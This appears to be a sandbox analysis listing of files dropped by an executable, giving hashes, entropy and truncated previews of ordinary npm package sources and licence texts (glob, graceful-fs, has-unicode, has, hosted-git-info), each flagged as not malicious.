              Preview:#!/usr/bin/env node.import { foregroundChild } from 'foreground-child';.import { existsSync } from 'fs';.import { readFile } from 'fs/promises';.import { jack } from 'jackspeak';.import { join } from 'path';.import { fileURLToPath } from 'url';.import { globStream } from './index.js';./* c8 ignore start */.const { version } = JSON.parse(await readFile(fileURLToPath(new URL('../../package.json', import.meta.url)), 'utf8').catch(() => readFile(fileURLToPath(new URL('../../package.json', import.meta.url)), 'utf8')));./* c8 ignore stop */.const j = jack({. usage: 'glob [options] [<pattern> [<pattern> ...]]',.}). .description(`. Glob v${version}.. Expand the positional glob expression arguments into any matching file. system paths found.. `). .opt({. cmd: {. short: 'c',. hint: 'command',. description: `Run the command provided, passing the glob expression. matches as arguments.`,. },.}). .opt({. default: {. short:
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):8032
              Entropy (8bit):4.343608500475798
              Encrypted:false
              SSDEEP:
              MD5:489875441E7385970CEC6246A867AB04
              SHA1:CEC4D419DA444C846418C025128DC57FB341FA8F
              SHA-256:4294AE83BE20D6A4D1DFFEC38FF6BF0773B88D686AA595F82B1EAA04F10F0A3B
              SHA-512:FC494238205D63747294099A10A1C77A666A7BB95BC1EDD41C4EA33315FFDCE6292466C667B29713DB2020506EC06311F1E00B23B0953E9886C7BDEBA319AFC4
              Malicious:false
              Reputation:unknown
              Preview:import { Minimatch } from 'minimatch';.import { PathScurry, PathScurryDarwin, PathScurryPosix, PathScurryWin32, } from 'path-scurry';.import { fileURLToPath } from 'url';.import { Pattern } from './pattern.js';.import { GlobStream, GlobWalker } from './walker.js';.// if no process global, just call it linux..// so we default to case-sensitive, / separators.const defaultPlatform = typeof process === 'object' &&. process &&. typeof process.platform === 'string'. ? process.platform. : 'linux';./**. * An object that can perform glob pattern traversals.. */.export class Glob {. absolute;. cwd;. root;. dot;. dotRelative;. follow;. ignore;. magicalBraces;. mark;. matchBase;. maxDepth;. nobrace;. nocase;. nodir;. noext;. noglobstar;. pattern;. platform;. realpath;. scurry;. stat;. signal;. windowsPathsNoEscape;. withFileTypes;. /**. * The options provided to the constructor.. */. opts;. /**.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):917
              Entropy (8bit):4.637278876565903
              Encrypted:false
              SSDEEP:
              MD5:F452DA300A57F72EBA10FD3338A33106
              SHA1:60C05E7D2BDCBAF2D02E679BF377C25D5E7D7831
              SHA-256:875F1DC7229D850E9ADAC1786CF1F0FEA3A718F4E91242049BE0E409C19A8E02
              SHA-512:BDF4EEDEA26E320D35DC33E4B3CEA19396AE2B6E3707F5B72038BF3D5FC704304C983D7B56A8E3F2D9FAAA31397089FF91C22167363CB842E0FB89BFDC654F01
              Malicious:false
              Reputation:unknown
              Preview:import { Minimatch } from 'minimatch';./**. * Return true if the patterns provided contain any magic glob characters,. * given the options provided.. *. * Brace expansion is not considered "magic" unless the `magicalBraces` option. * is set, as brace expansion just turns one string into an array of strings.. * So a pattern like `'x{a,b}y'` would return `false`, because `'xay'` and. * `'xby'` both do not contain any magic glob characters, and it's treated the. * same as if you had called it on `['xay', 'xby']`. When `magicalBraces:true`. * is in the options, brace expansion _is_ treated as a pattern having magic.. */.export const hasMagic = (pattern, options = {}) => {. if (!Array.isArray(pattern)) {. pattern = [pattern];. }. for (const p of pattern) {. if (new Minimatch(p, options).hasMagic()). return true;. }. return false;.};.//# sourceMappingURL=has-magic.js.map
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):3833
              Entropy (8bit):4.157193604331426
              Encrypted:false
              SSDEEP:
              MD5:35ADAFA51C8A45674345F37C0BE27635
              SHA1:1478BBDCABCD9D3BCE148BDFAE9D1A6B444622C7
              SHA-256:3AA39586102A638391CCE6D6FBAB2F5134B45101ED2D676623C97A148DA87F3B
              SHA-512:07235056C2D16AFBC1829D5DC51978D9A319B78167B3C2C38AECB3252F89F6EE6D07AA4AFA980E5FD7764E853C01FD6FDFB08A219F042D534B66B5ED48F7A97B
              Malicious:false
              Reputation:unknown
              Preview:// give it a pattern, and it'll be able to tell you if.// a given path should be ignored..// Ignoring a path ignores its children if the pattern ends in /**.// Ignores are always parsed in dot:true mode.import { Minimatch } from 'minimatch';.import { Pattern } from './pattern.js';.const defaultPlatform = typeof process === 'object' &&. process &&. typeof process.platform === 'string'. ? process.platform. : 'linux';./**. * Class used to process ignored patterns. */.export class Ignore {. relative;. relativeChildren;. absolute;. absoluteChildren;. constructor(ignored, { nobrace, nocase, noext, noglobstar, platform = defaultPlatform, }) {. this.relative = [];. this.absolute = [];. this.relativeChildren = [];. this.absoluteChildren = [];. const mmopts = {. dot: true,. nobrace,. nocase,. noext,. noglobstar,. optimizationLevel: 2,. platform,. n
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:Java source, ASCII text
              Category:dropped
              Size (bytes):10465
              Entropy (8bit):4.0177604761818
              Encrypted:false
              SSDEEP:
              MD5:F550C310248C78331DC0C7C3800AF3CC
              SHA1:2A7BFCC7DB2F494F1EB6CBC9D2C8A4931606418A
              SHA-256:89BAB0333FE9EFC322D1E8458C06068E7EEBEC6AA88151C159DD72D9CD119C1D
              SHA-512:C537E8D030416FF688172257E0D0AC82FA52C3B47DE931160B8F592CCC6FA8638C56A6F5FEE5BF9E82FCFC23586C2808717C44F2BB331FF1AA49E98A2F3D89A3
              Malicious:false
              Reputation:unknown
              Preview:// synchronous utility for filtering entries and calculating subwalks.import { GLOBSTAR } from 'minimatch';./**. * A cache of which patterns have been processed for a given Path. */.export class HasWalkedCache {. store;. constructor(store = new Map()) {. this.store = store;. }. copy() {. return new HasWalkedCache(new Map(this.store));. }. hasWalked(target, pattern) {. return this.store.get(target.fullpath())?.has(pattern.globString());. }. storeWalked(target, pattern) {. const fullpath = target.fullpath();. const cached = this.store.get(fullpath);. if (cached). cached.add(pattern.globString());. else. this.store.set(fullpath, new Set([pattern.globString()]));. }.}./**. * A record of which paths have been matched in a given walk step,. * and whether they only are considered a match if they are a directory,. * and whether their absolute or relative path should be returned.. */.export class M
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):2538
              Entropy (8bit):4.709561403353893
              Encrypted:false
              SSDEEP:
              MD5:9C012A2D5833353CCC320E6C73F7CFB4
              SHA1:00856B2B9BA92E6FF019FDBB33284F082528AAB7
              SHA-256:A01B65753518F55FD68499C2FAED4412C50FF861B4D0AE44BA6236F8CF25362A
              SHA-512:62D72FD68313DC2AC339A098065233837A7F40BC6B774E1740DA184FD64385E531D8EED28BB826F984576A4E44991447838C84F90FEB8E62A4C62D83009EFD53
              Malicious:false
              Reputation:unknown
              Preview:{. "author": "Isaac Z. Schlueter <i@izs.me> (https://blog.izs.me/)",. "name": "glob",. "description": "the most correct and second fastest glob implementation in JavaScript",. "version": "10.3.10",. "type": "module",. "tshy": {. "main": true,. "exports": {. "./package.json": "./package.json",. ".": "./src/index.ts". }. },. "bin": "./dist/esm/bin.mjs",. "main": "./dist/commonjs/index.js",. "types": "./dist/commonjs/index.d.ts",. "exports": {. "./package.json": "./package.json",. ".": {. "import": {. "types": "./dist/esm/index.d.ts",. "default": "./dist/esm/index.js". },. "require": {. "types": "./dist/commonjs/index.d.ts",. "default": "./dist/commonjs/index.js". }. }. },. "repository": {. "type": "git",. "url": "git://github.com/isaacs/node-glob.git". },. "files": [. "dist". ],. "scripts": {. "preversion": "npm test",. "postversion": "npm publish",. "prepublishOnly": "git push
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):791
              Entropy (8bit):5.059731182646766
              Encrypted:false
              SSDEEP:
              MD5:163972D49C2F7A3D3B687AEB48E9E3C9
              SHA1:13E4A8932F9E1C52C3FEB92C88CC523701E15D41
              SHA-256:F65C5D9F22A317B2A10803BD1868461CE6499C2ED7217BC80C0CC772A748789C
              SHA-512:F52FAF7306A150325A835D0B3642901214638E2BA349A840877A407F7532BC6A2BA47F5571A09CCB8D17EC69A959D538737A1EC565379D61E0C6ADB74A84630D
              Malicious:false
              Reputation:unknown
              Preview:The ISC License..Copyright (c) 2011-2022 Isaac Z. Schlueter, Ben Noordhuis, and Contributors..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR.IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):496
              Entropy (8bit):4.684867221855962
              Encrypted:false
              SSDEEP:
              MD5:F8B8F88D8550294C47EE5CC6E8EC141C
              SHA1:C912F366FE0025EA74E0E76E58277147DC0A3167
              SHA-256:7258ECA52E65D69845759503F9FDD66C252F40E5EAFB76DB5D481172E31AC9ED
              SHA-512:57FD42C80A8DB172734CA9D270348EB29825E52EFB0619D53149084D6CD8CDBCE8159ABC2F89A3BC127AA7BE44E223BCF1F43DD0F4B0DE607DEC2E80B1B5A1E4
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..module.exports = clone..var getPrototypeOf = Object.getPrototypeOf || function (obj) {. return obj.__proto__.}..function clone (obj) {. if (obj === null || typeof obj !== 'object'). return obj.. if (obj instanceof Object). var copy = { __proto__: getPrototypeOf(obj) }. else. var copy = Object.create(null).. Object.getOwnPropertyNames(obj).forEach(function (key) {. Object.defineProperty(copy, key, Object.getOwnPropertyDescriptor(obj, key)). }).. return copy.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):12680
              Entropy (8bit):4.711468320029871
              Encrypted:false
              SSDEEP:
              MD5:63D49916C84E2BBDA13D6563D9DC18B5
              SHA1:55EFC5A24C26495D0341C7884F0DE5EB36520EFA
              SHA-256:7DA35669B6B6B0E4AAFEE31674C033F2CEBB0C8F9AE010F709DCC185D3F17786
              SHA-512:36C3CF7D8EEFC90640DD0BC48379F81E194F596084869003EAADD95DB34951E6A19C202C244A9F3894047DB0A312723CA1FD8171B27B29B2B78FFF87A03F3239
              Malicious:false
              Reputation:unknown
              Preview:var fs = require('fs').var polyfills = require('./polyfills.js').var legacy = require('./legacy-streams.js').var clone = require('./clone.js')..var util = require('util')../* istanbul ignore next - node 0.x polyfill */.var gracefulQueue.var previousSymbol../* istanbul ignore else - node 0.x polyfill */.if (typeof Symbol === 'function' && typeof Symbol.for === 'function') {. gracefulQueue = Symbol.for('graceful-fs.queue'). // This is used in testing by future versions. previousSymbol = Symbol.for('graceful-fs.previous').} else {. gracefulQueue = '___graceful-fs.queue'. previousSymbol = '___graceful-fs.previous'.}..function noop () {}..function publishQueue(context, queue) {. Object.defineProperty(context, gracefulQueue, {. get: function() {. return queue. }. }).}..var debug = noop.if (util.debuglog). debug = util.debuglog('gfs4').else if (/\bgfs4\b/i.test(process.env.NODE_DEBUG || '')). debug = function() {. var m = util.format.apply(util, arguments). m = 'GFS4
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):2655
              Entropy (8bit):4.567539088339503
              Encrypted:false
              SSDEEP:
              MD5:620FC152DC9BFA087F9901703B1E2616
              SHA1:F4A3583D4C3E8B0C407AB8406BDAFB02B4055B7F
              SHA-256:60A6A7ECF7C3E55A3FFAAE13433B6CFF388B7205BBA6DAF393C863F77A949E36
              SHA-512:7C9DA94D2DADECAFE60DA4C7B739AE00B150610B2B5C0A45450453ADF932A852FB655114CB27249C21E31C2A0F647605A21A7FE1D06FFF7848EA996A367CD9F2
              Malicious:false
              Reputation:unknown
              Preview:var Stream = require('stream').Stream..module.exports = legacy..function legacy (fs) {. return {. ReadStream: ReadStream,. WriteStream: WriteStream. }.. function ReadStream (path, options) {. if (!(this instanceof ReadStream)) return new ReadStream(path, options);.. Stream.call(this);.. var self = this;.. this.path = path;. this.fd = null;. this.readable = true;. this.paused = false;.. this.flags = 'r';. this.mode = 438; /*=0666*/. this.bufferSize = 64 * 1024;.. options = options || {};.. // Mixin options into this. var keys = Object.keys(options);. for (var index = 0, length = keys.length; index < length; index++) {. var key = keys[index];. this[key] = options[key];. }.. if (this.encoding) this.setEncoding(this.encoding);.. if (this.start !== undefined) {. if ('number' !== typeof this.start) {. throw TypeError('start must be a Number');. }. if (this.end === undefined) {. this.end = Infin
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1031
              Entropy (8bit):4.579458861414724
              Encrypted:false
              SSDEEP:
              MD5:BABC4604A4E9958A063E1941F873D11F
              SHA1:21A733B3F7E2EE153041DE90FB03D5596934F346
              SHA-256:5747D4BA6B17165C6ECAC30AB3A331715F41C7AD546E1F1574DAB1BDCB116181
              SHA-512:25DF7BBDED9EC1E4766E94C2E0C41013612AFEAE586B0A2469EC9A47181A8FBF5E599ADBD96CD6B77B84EF20896F1888AF3202CB1A87948A2EFDA88B7B7B95ED
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "graceful-fs",. "description": "A drop-in replacement for fs, making various improvements.",. "version": "4.2.11",. "repository": {. "type": "git",. "url": "https://github.com/isaacs/node-graceful-fs". },. "main": "graceful-fs.js",. "directories": {. "test": "test". },. "scripts": {. "preversion": "npm test",. "postversion": "npm publish",. "postpublish": "git push origin --follow-tags",. "test": "nyc --silent node test.js | tap -c -",. "posttest": "nyc report". },. "keywords": [. "fs",. "module",. "reading",. "retry",. "retries",. "queue",. "error",. "errors",. "handling",. "EMFILE",. "EAGAIN",. "EINVAL",. "EPERM",. "EACCESS". ],. "license": "ISC",. "devDependencies": {. "import-fresh": "^2.0.0",. "mkdirp": "^0.5.0",. "rimraf": "^2.2.8",. "tap": "^16.3.4". },. "files": [. "fs.js",. "graceful-fs.js",. "legacy-streams.js",. "polyfills.js",. "clone.js". ],. "tap": {.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):10141
              Entropy (8bit):4.56580768213476
              Encrypted:false
              SSDEEP:
              MD5:14CBBF8E8D0632089994286844259752
              SHA1:38F3028EA7D9EC6B57F56EF32128499522C87A7F
              SHA-256:66EA1687ED5EDF39D67296D26EDCCC8DA695D9A869303A78D0E580CD770ACA27
              SHA-512:7D49278C50A12A70028AE3D5ADF7CD78B2FED80DE1C5677C220E4EB05487FA4ECDC69E13E7FCEEE7490BA7AF49687012D3C4AC2D87D6FF46E71ECC4B71AC5136
              Malicious:false
              Reputation:unknown
              Preview:var constants = require('constants')..var origCwd = process.cwd.var cwd = null..var platform = process.env.GRACEFUL_FS_PLATFORM || process.platform..process.cwd = function() {. if (!cwd). cwd = origCwd.call(process). return cwd.}.try {. process.cwd().} catch (er) {}..// This check is needed until node.js 12 is required.if (typeof process.chdir === 'function') {. var chdir = process.chdir. process.chdir = function (d) {. cwd = null. chdir.call(process, d). }. if (Object.setPrototypeOf) Object.setPrototypeOf(process.chdir, chdir).}..module.exports = patch..function patch (fs) {. // (re-)implement some things that are known busted or missing... // lchmod, broken prior to 0.6.2. // back-port the fix here.. if (constants.hasOwnProperty('O_SYMLINK') &&. process.version.match(/^v0\.6\.[0-2]|^v0\.5\./)) {. patchLchmod(fs). }.. // lutimes implementation, or no-op. if (!fs.lutimes) {. patchLutimes(fs). }.. // https://github.com/isaacs/node-graceful-fs/issues/4
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):752
              Entropy (8bit):5.0549042450081485
              Encrypted:false
              SSDEEP:
              MD5:2BAB5B1C26E9C44FC4E489BB98CFB196
              SHA1:0478D8708F5FF5E49C150412201CB066A9B2006D
              SHA-256:7C9C21C620F09FA0897060A50AE3B02DA7677338C72CBE399DBE417D74899974
              SHA-512:D5C3FB4F48EB366075E387672FF46B3A7513F02F8D16FA51460321DC4CA873F25A1D36B0D7E633F50AC8CEA4800A330DA1D6A4805AF35AAF250B024A49D590D1
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2014, Rebecca Turner <me@re-becca.org>..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES.WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF.MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR.ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES.WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN.ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF.OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE...
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):657
              Entropy (8bit):4.827651597047154
              Encrypted:false
              SSDEEP:
              MD5:C6CE2D7686D2808902ABF12837367527
              SHA1:38B6C5BCC04ADE8672F9227840E6B9F57BE816C7
              SHA-256:F7055F40138C028925CA76B74EA5A4041B4D67D2FA4DAE2F78C2EC326EBC2BF3
              SHA-512:F67A9AC445134AC29EE15D0D41F6E32A5277D3E5085424E5117704834D992CC992C3F7A8B5A526B3300652E09139AEAC97BFCE1737092E6BDECE9DEB6A474ECD
              Malicious:false
              Reputation:unknown
              Preview:"use strict".var os = require("os")..var hasUnicode = module.exports = function () {. // Recent Win32 platforms (>XP) CAN support unicode in the console but. // don't have to, and in non-english locales often use traditional local. // code pages. There's no way, short of windows system calls or execing. // the chcp command line program to figure this out. As such, we default. // this to false and encourage your users to override it via config if. // appropriate.. if (os.type() == "Windows_NT") { return false }.. var isUTF8 = /UTF-?8$/i. var ctype = process.env.LC_ALL || process.env.LC_CTYPE || process.env.LANG. return isUTF8.test(ctype).}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):639
              Entropy (8bit):4.670064919760595
              Encrypted:false
              SSDEEP:
              MD5:F14043C8A5D6DF10D3671D83073D6883
              SHA1:F25B286B591E5AA36E855957980E27569961D706
              SHA-256:F106BBFF8F1AED94EF54031D8A4E5EBD0275B3FEFC15361A96150D9029A9D510
              SHA-512:94D6630AF51D0EC41C92E3014D81CB948DB99183628B057A056018C916554518327B961121A348B90105CEC6A76CA20F204CA739A8D9EDC87A42C84041AA9F5C
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "has-unicode",. "version": "2.0.1",. "description": "Try to guess if your terminal supports unicode",. "main": "index.js",. "scripts": {. "test": "tap test/*.js". },. "repository": {. "type": "git",. "url": "https://github.com/iarna/has-unicode". },. "keywords": [. "unicode",. "terminal". ],. "files": [. "index.js". ],. "author": "Rebecca Turner <me@re-becca.org>",. "license": "ISC",. "bugs": {. "url": "https://github.com/iarna/has-unicode/issues". },. "homepage": "https://github.com/iarna/has-unicode",. "devDependencies": {. "require-inject": "^1.3.0",. "tap": "^2.3.1". }.}.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):1060
              Entropy (8bit):5.102184095083403
              Encrypted:false
              SSDEEP:
              MD5:D000AFC3C9FF3501A5610197DB76A246
              SHA1:7C2355FEC210EDC01AA53D54E29B4A2DD9DE51AB
              SHA-256:4FE5FD7B3318DEF0B74F8BF8C9276403F01DA628FA8888822661519D80F237D3
              SHA-512:D04498917C46A6562F94EB6D9C17FAF2ADC6F36EB4E39E4F34C02F28E81B7153D92B35329EEF896C8516518F6510ECD0FFC494EFEB21C52CCBAF6C1128E18B53
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2013 Thiago de Arruda..Permission is hereby granted, free of charge, to any person.obtaining a copy of this software and associated documentation.files (the "Software"), to deal in the Software without.restriction, including without limitation the rights to use,.copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following.conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES.OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT.HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,.WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:JSON data
              Category:dropped
              Size (bytes):1011
              Entropy (8bit):4.660694377238191
              Encrypted:false
              SSDEEP:
              MD5:2FEE243336BA5AEEBED1E0145472CD49
              SHA1:0B2FCBE54BBE41CDD6F10A52E137143B5DBC9EDF
              SHA-256:15A15D9A842B353DAAFA9F4315D3D9E0D09B02B92E68CD39C8553BE50F16F469
              SHA-512:7120FD3871E503CC5F9C3E08B81CE849C59CD75B97B03EE04CF5BBB1C5426314164B6C61933800077073E9E44CF21F9AC33E6502086260366635702599CE0EEC
              Malicious:false
              Reputation:unknown
              Preview:{. "name": "has",. "description": "Object.prototype.hasOwnProperty.call shortcut",. "version": "1.0.3",. "homepage": "https://github.com/tarruda/has",. "author": {. "name": "Thiago de Arruda",. "email": "tpadilha84@gmail.com". },. "contributors": [. {. "name": "Jordan Harband",. "email": "ljharb@gmail.com",. "url": "http://ljharb.codes". }. ],. "repository": {. "type": "git",. "url": "git://github.com/tarruda/has.git". },. "bugs": {. "url": "https://github.com/tarruda/has/issues". },. "license": "MIT",. "licenses": [. {. "type": "MIT",. "url": "https://github.com/tarruda/has/blob/master/LICENSE-MIT". }. ],. "main": "./src",. "dependencies": {. "function-bind": "^1.1.1". },. "devDependencies": {. "@ljharb/eslint-config": "^12.2.1",. "eslint": "^4.19.1",. "tape": "^4.9.0". },. "engines": {. "node": ">= 0.4.0". },. "scripts": {. "lint": "eslint .",. "pretest": "npm run lint",. "test": "tape t
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):129
              Entropy (8bit):4.808227233869547
              Encrypted:false
              SSDEEP:
              MD5:A8D64BBA485FCF821ADE7CE6E94F9C0A
              SHA1:C8707FC359371B352F776588E694682E81AE2654
              SHA-256:D4FA3FFE19A4722028A3D34982B75EAE4D6D2C45D737E7967FFBA9CE13515C4C
              SHA-512:1965437F98967D01CC0BF699886A9B7B7FF1C14980648E16AB26BD9FE5D2255733BF0717136E8612DE84C1FB624654F38D945FF9B722A6F8D66E4EDC55813CDF
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var bind = require('function-bind');..module.exports = bind.call(Function.call, Object.prototype.hasOwnProperty);.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):331
              Entropy (8bit):4.711695444559378
              Encrypted:false
              SSDEEP:
              MD5:91CF2AC2CDF73A0D46F9BE0607E6AF94
              SHA1:8A5CD3CE486422C713E3DAF52BADE3FAFE01885F
              SHA-256:E1DD5FE5AA345C51241F8B04D9751BEF53A9910D00E099E186AF9CB804C7DE5A
              SHA-512:15205D5F0E82004347B033C4728D29BA9F02B498B625DAAA623C6BB18F9339ABA443C5542013CDC37A1255B1B04BAEB2744CC16C0ABE611CB1A44A923A86DFA0
              Malicious:false
              Reputation:unknown
              Preview:'use strict';..var test = require('tape');.var has = require('../');..test('has', function (t) {. t.equal(has({}, 'hasOwnProperty'), false, 'object literal does not have own property "hasOwnProperty"');. t.equal(has(Object.prototype, 'hasOwnProperty'), true, 'Object.prototype has own property "hasOwnProperty"');. t.end();.});.
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):733
              Entropy (8bit):5.004216912282677
              Encrypted:false
              SSDEEP:
              MD5:A01F10CD299D5727263720D47CC2C908
              SHA1:F87FE9863DC6D7D54117B1670CE07A85715DC465
              SHA-256:C1476EC53119CD4C8370F91F5152AC76312A29B4FAE2D49B5E0E0970FE0FA5EE
              SHA-512:354075CA5DCEB975CA6307C53CBE032AA806DA5B0D4823088FCF656EFE1E7FF815B38E2D665E3456D4389E2E1BD8999690703DF393E78894FBE9F1247CFE2D31
              Malicious:false
              Reputation:unknown
              Preview:Copyright (c) 2015, Rebecca Turner..Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted, provided that the above.copyright notice and this permission notice appear in all copies...THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH.REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND.FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,.INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM.LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR.OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR.PERFORMANCE OF THIS SOFTWARE..
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):4219
              Entropy (8bit):4.733373560192891
              Encrypted:false
              SSDEEP:
              MD5:C0327DA0C2E3B8820E9D27E4A56B9D48
              SHA1:2EB7CF21436EB8BB39C7343B0EF062887B0A08A3
              SHA-256:BE08A3F35F54A3A9510B0C2ED3E6DB03E1427965D5B189EB00BD09659938F52A
              SHA-512:B396419D33901D86C2828183B85CE160403FF878E32C92A923CBD73CFBCF8F88502C9EF23FE9340CE6AF28AA542AE60AA81AA3FB983130D78C1D31B0CD4ACA61
              Malicious:false
              Reputation:unknown
              Preview:'use strict'..const parseUrl = require('./parse-url')..// look for github shorthand inputs, such as npm/cli.const isGitHubShorthand = (arg) => {. // it cannot contain whitespace before the first #. // it cannot start with a / because that's probably an absolute file path. // but it must include a slash since repos are username/repository. // it cannot start with a . because that's probably a relative file path. // it cannot start with an @ because that's a scoped package if it passes the other tests. // it cannot contain a : before a # because that tells us that there's a protocol. // a second / may not exist before a #. const firstHash = arg.indexOf('#'). const firstSlash = arg.indexOf('/'). const secondSlash = arg.indexOf('/', firstSlash + 1). const firstColon = arg.indexOf(':'). const firstSpace = /\s/.exec(arg). const firstAt = arg.indexOf('@').. const spaceOnlyAfterHash = !firstSpace || (firstHash > -1 && firstSpace.index > firstHash). const atOnlyAfterHash = firstA
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:ASCII text
              Category:dropped
              Size (bytes):8997
              Entropy (8bit):4.9413492626476865
              Encrypted:false
              SSDEEP:
              MD5:0FB2CC7BE297F40C3660A850068FD624
              SHA1:26F548E1C78E0BD703F000760470093581404351
              SHA-256:34B1185124A00FEFC3D13B9DC11D6164B32F1467502E12F62D539FB4C9370AE1
              SHA-512:8D66D6E951BB2AE4EED4031705E1203D28FFD9F24736750931978AB5A35F35531B114C40DF6226632E028210FB589BDA24D145B8555997FBD0998E223E7BF97E
              Malicious:false
              Reputation:unknown
              Preview:/* eslint-disable max-len */..'use strict'..const maybeJoin = (...args) => args.every(arg => arg) ? args.join('') : ''.const maybeEncode = (arg) => arg ? encodeURIComponent(arg) : ''.const formatHashFragment = (f) => f.toLowerCase().replace(/^\W+|\/|\W+$/g, '').replace(/\W+/g, '-')..const defaults = {. sshtemplate: ({ domain, user, project, committish }) =>. `git@${domain}:${user}/${project}.git${maybeJoin('#', committish)}`,. sshurltemplate: ({ domain, user, project, committish }) =>. `git+ssh://git@${domain}/${user}/${project}.git${maybeJoin('#', committish)}`,. edittemplate: ({ domain, user, project, committish, editpath, path }) =>. `https://${domain}/${user}/${project}${maybeJoin('/', editpath, '/', maybeEncode(committish || 'HEAD'), '/', path)}`,. browsetemplate: ({ domain, user, project, committish, treepath }) =>. `https://${domain}/${user}/${project}${maybeJoin('/', treepath, '/', maybeEncode(committish))}`,. browsetreetemplate: ({ domain, user, project, commi
              Process:C:\Users\user\Desktop\JWQgbclQK5.exe
              File Type:C++ source, ASCII text
              Category:dropped
              Size (bytes):4416
              Entropy (8bit):4.654379311711501
              Encrypted:false
              SSDEEP:
              MD5:B54DFD3BC37231551AB0E2D2E6C84D99
              SHA1:4E88B53A69EDF44AD9493762872E94B88DCDD537
              SHA-256:356091C388C6390D7AA449A1F9B5A199416EE9147C087AADB1E96BE406E6740E
              SHA-512:6AD06519B47499F691438C50067B54486E843BC3EFEBA0B05731555EA1D0D98ABBB5CD4F047D98FBBF28856EAF3572D3AD47AAFC159DF345D7A18DCE132C2863
              Malicious:false
              Reputation:unknown
